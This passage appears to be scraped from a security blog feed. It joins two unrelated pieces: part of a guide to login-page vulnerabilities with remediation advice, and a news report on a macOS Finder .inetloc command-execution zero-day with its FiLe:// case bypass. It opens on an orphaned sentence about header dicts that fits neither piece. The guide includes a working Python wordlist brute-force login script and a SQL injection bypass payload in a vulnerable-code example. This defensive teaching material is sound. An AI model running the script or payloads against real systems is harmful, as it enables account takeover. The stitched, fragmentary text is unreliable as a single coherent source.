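Each yielded dict would be merged into the headers of the next login attempt; if the block counter resets, the limiter is keyed on an attacker-controlled value.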

To test this issue, use Burp's Intruder feature or any custom brute-force script with a wordlist of around 200 passwords that includes the account's actual password. If the application doesn't restrict the invalid attempts and returns a successful response for the valid password, it is an indication that the application doesn't implement any sort of brute-force protection.
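A custom brute-force script of the kind described can be sketched as follows. The failure marker «Invalid credentials» and the form field names are assumptions; replace them with the generic error string and fields the target actually uses:

```python
# Sketch of a wordlist brute-force loop (stdlib only).
import urllib.error
import urllib.parse
import urllib.request

def attempt_failed(status: int, body: str) -> bool:
    """Classify a login response as a failure. The marker string is an
    assumption -- substitute the target's real error message."""
    return status in (401, 403) or "Invalid credentials" in body

def brute_force(login_url: str, username: str, wordlist):
    """Return the first password whose response does not look like a failure."""
    for password in wordlist:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        try:
            with urllib.request.urlopen(
                    urllib.request.Request(login_url, data=data)) as resp:
                status, body = resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            status, body = err.code, ""
        if not attempt_failed(status, body):
            return password
    return None
```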

Remediation: To remediate this issue, a developer may implement rate limiting or CAPTCHA as an anti-automation mechanism.

Credentials Over Unencrypted Channel

If the application accepts credentials and logs a user in over an unencrypted channel, i.e. over HTTP instead of HTTPS, the communication is vulnerable to a man-in-the-middle attack: an attacker may be able to sniff the network and steal sensitive information.

Remediation: To remediate this issue, the developers need to strictly enforce HTTPS so that the application doesn’t communicate over HTTP. As a best practice, the developers should implement HSTS headers across all the subdomains as well.

Additionally, implementing the Secure flag on session cookies issued after login over HTTPS ensures that the cookies cannot be stolen over an unencrypted channel or via attacks like man-in-the-middle.
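The two controls above can be illustrated concretely. The header names and attribute values below are standard HTTP; the cookie name `sid` and the one-year HSTS max-age are arbitrary example choices:

```python
# Sketch of the server-side response pieces: an HSTS header and a session
# cookie carrying the Secure (and HttpOnly) flags.
HSTS_HEADER = ("Strict-Transport-Security",
               "max-age=31536000; includeSubDomains")

def session_cookie_header(name: str, value: str) -> str:
    """Build a Set-Cookie value: Secure keeps the cookie off plain HTTP,
    HttpOnly keeps it away from JavaScript."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"
```

Both would be emitted on the post-login response, whatever framework is in use.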

Cross-Site Scripting

Login pages may also be vulnerable to cross-site scripting in multiple scenarios. Such XSS is generally unauthenticated, but it can still be used to perform malicious actions such as redirecting a user to an attacker-controlled website and social-engineering them into giving up their credentials.

Let’s assume an application whose login page reflects an invalid username in the error message. The username is also present in the URL, like www.something.com/login/?user=harsh; an attacker may attempt reflected cross-site scripting by sending a malicious JavaScript payload in the user parameter.

Remediation: To remediate this issue, the developers should implement proper input validation and sanitisation on the input fields and avoid reflecting user-supplied input in error messages.

Additionally, implementing an HttpOnly flag on the session cookies protects sensitive cookies from being stolen via scripting attacks.
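The output-encoding part of the remediation can be sketched in a few lines; the error-page markup here is a hypothetical example of the reflected message described above:

```python
# Sketch: escape user-controlled input before reflecting it in an error page,
# so a payload like <script>alert(1)</script> renders as inert text.
import html

def render_login_error(raw_username: str) -> str:
    """Return the login-error fragment with the username HTML-escaped."""
    return f"<p>User {html.escape(raw_username)} was not found.</p>"
```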

Parameter Pollution & Mass Assignment

A simple security misconfiguration may allow an attacker to bypass authentication and gain unauthorised access to a victim user’s account. In this attack scenario, an attacker may attempt to bind multiple values to the same key or define multiple key-value pairs, i.e. supplying multiple usernames in the username parameter or multiple username parameters themselves. Depending on how the server processes this, it may allow an attacker to access another user’s account.
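The root cause is that different back ends resolve a polluted query string differently. A small demonstration with Python's standard parser, using hypothetical parameter values:

```python
# How the same polluted query string can mean different things to
# different back ends -- the basis of HTTP parameter pollution.
from urllib.parse import parse_qs

polluted = "username=victim&username=attacker&password=guess"
parsed = parse_qs(polluted)  # parse_qs keeps every value per key

# Some frameworks take the first value, others the last, others the
# whole list -- server-side code must reject duplicates explicitly.
first_wins = {k: v[0] for k, v in parsed.items()}
last_wins = {k: v[-1] for k, v in parsed.items()}
```

If the authentication check reads one copy of the parameter and the account lookup reads the other, the mismatch becomes an account-takeover primitive.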

Remediation: To remediate this issue, the developers need to ensure that the application discards the use of multiple key-value pairs and only accepts one at a time to avoid this attack. Also, developers would need to check if any additional parameter is added to the original request and discard all the additional parameters, accepting the originally supplied parameters only. 

SQL/NoSQL/LDAP/XML Injection

This is one of the most common attacks that comes to one’s mind when we talk about login functionality. Based on the implementation used in the login functionality, an attacker may attempt to bypass it by injecting SQL/NoSQL/LDAP/XML injection payloads and gain access to the victim’s account.

Remediation: To remediate this issue, the developers must ensure that the user-supplied input is validated correctly and security best practices for implementing database queries are followed. You can find a detailed guide at: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
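For the SQL case specifically, the difference between a vulnerable and a safe query is parameterization, as the linked cheat sheet recommends. A minimal sketch with an in-memory SQLite database (table, rows, and the classic `' OR '1'='1` payload are illustrative only):

```python
# Sketch: string-built SQL vs. a parameterized query, against the classic
# authentication-bypass payload.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_vulnerable(user: str, password: str) -> bool:
    # DON'T: concatenation lets ' OR '1'='1 escape the quoting.
    q = f"SELECT * FROM users WHERE username='{user}' AND password='{password}'"
    return conn.execute(q).fetchone() is not None

def login_safe(user: str, password: str) -> bool:
    # DO: placeholders keep user input as data, never as SQL.
    q = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(q, (user, password)).fetchone() is not None
```

The same placeholder discipline applies to NoSQL, LDAP, and XML back ends: user input must never be spliced into the query language itself.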

Sensitive Information Disclosure

While performing a login action, it is often observed that some applications store the credentials in the response or in JavaScript files. An attacker may attempt to extract the credentials from the response or the JavaScript files. Also, in some cases, the application may expose additional information belonging to other users or to the application server itself, which may help further exploitation.

Remediation: To remediate this issue, the developers must ensure that the application doesn’t cache or store sensitive information such as credentials in an insecure place such as server response or javascript files.

Response Manipulation

Often, it is observed that the application returns “success”:false or “success”:true or similar responses when an invalid vs a valid set of credentials is supplied. However, if the application is not performing server-side validation properly, it is possible to manipulate the response; for example, changing “success”:false to “success”:true may allow an attacker to gain unauthorised access to the victim’s account. This attack mainly succeeds where the authentication token or cookie generation logic lies on the client side, which is a bad practice.

Similarly, in many scenarios, the application also uses different response status codes such as 403, 200, etc. It is possible to change the status code from 403 to 200 to bypass the restriction and attempt to gain successful access to the victim’s account.

Remediation: To remediate this issue, the developers need to make sure that the server-side validation is in place and any attempts of client-side manipulation are discarded.
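One way to keep the decision server-side is to make the session artifact itself unforgeable: the server issues a signed token only after credentials verify, so flipping a `"success"` flag in the response body gains the attacker nothing. A generic stdlib sketch (the key handling and token format are illustrative, not a production session scheme):

```python
# Sketch: HMAC-signed session token issued only by the server.
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # kept server-side only

def issue_token(username: str) -> str:
    """Called only after the server itself has verified the credentials."""
    sig = hmac.new(SERVER_KEY, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}.{sig}"

def verify_token(token: str) -> bool:
    """Any client-side tampering breaks the signature."""
    username, _, sig = token.rpartition(".")
    expected = hmac.new(SERVER_KEY, username.encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(sig, expected)
```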

Authentication Bypass

In certain situations, it is not possible to bypass the authentication directly, but it is still possible to reach specific endpoints or pages by navigating to them directly or in some other way. This allows an attacker to bypass the authentication requirement and access those functionalities without authorisation.

For Example: An unauthenticated attacker performs a directory enumeration and identifies an endpoint /goto/administrator/ which is directly accessible to him without any restrictions.

Remediation: To remediate this issue, developers would be required to ensure that all the authenticated endpoints are adequately placed behind the authentication and a proper authorisation check is implemented.

Bonus: Cross-Site Request Forgery (with a twist)

Usually, most applications are vulnerable to login-based CSRF issues, but in general there is no security impact. That’s what you are thinking, right? However, when an application uses the Single Sign-On method, login CSRF comes in handy. It may allow an attacker to connect the victim user’s account to an attacker-controlled entity, which can then be used to steal sensitive information or perform malicious actions.

Example Report: https://hackerone.com/reports/171398

Remediation:  To remediate this issue, the developers must ensure that the state parameter is implemented and appropriately validated.

Apart from the above-mentioned vulnerabilities in the login page, several other vulnerabilities arise when third party integrations are used for authentication such as SAML, OAuth2.0 or other third party services. However, these authentication mechanisms are themselves a vast topic to understand and explore. We will soon be coming up with a separate series on Single Sign On (SSO) and JWT related attack vectors.

New macOS zero-day bug lets attackers run commands remotely

New macOS zero-day bug lets attackers run commands remotely

Original text by Sergiu Gatlan

Security researchers disclosed today a new vulnerability in Apple’s macOS Finder, which makes it possible for attackers to run arbitrary commands on Macs running any macOS version up to the latest release, Big Sur.

Zero-days are publicly disclosed flaws that haven’t been patched by the vendor which, in some cases, are also actively exploited by attackers or have publicly available proof-of-concept exploits.

The bug, found by independent security researcher Park Minchan, is due to the way macOS processes inetloc files, which inadvertently causes it to run any commands embedded inside by an attacker, without any warnings or prompts.

On macOS, Internet location files with .inetloc extensions are system-wide bookmarks that can be used to open online resources (news://, ftp://, afp://) or local files (file://).

«A vulnerability in macOS Finder allows files whose extension is inetloc to execute arbitrary commands,» an SSD Secure Disclosure advisory published today revealed.

«These files can be embedded inside emails which if the user clicks on them will execute the commands embedded inside them without providing a prompt or warning to the user.»

macOS zero-day demo
Image: SSD Secure Disclosure

Apple botches patch, doesn’t assign a CVE ID

While Apple silently fixed the issue without assigning a CVE identification number, as Minchan later discovered, Apple’s patch only partially addressed the flaw as it can still be exploited by changing the protocol used to execute the embedded commands from file:// to FiLe://.

«Newer versions of macOS (from Big Sur) have blocked the file:// prefix (in the com.apple.generic-internet-location) however they did a case matching causing File:// or fIle:// to bypass the check,» the advisory adds.

«We have notified Apple that FiLe:// (just mangling the value) doesn’t appear to be blocked, but have not received any response from them since the report has been made. As far as we know, at the moment, the vulnerability has not been patched.»

Although the researcher did not provide any info on how attackers might abuse this bug, it could potentially be used by threat actors to create malicious email attachments that would be able to launch a bundled or remote payload when opened by the target.

BleepingComputer also tested the proof-of-concept exploit shared by the researcher and confirmed that the vulnerability could be used to run arbitrary commands on macOS Big Sur using specially crafted files downloaded from the Internet without any prompts or warnings.

An .inetloc file with the PoC code was not detected by any of the antimalware engines on VirusTotal which means that macOS users potentially targeted by threat actors using this attack method won’t be protected by security software.

An Apple spokesperson was not available for comment when contacted by BleepingComputer earlier today.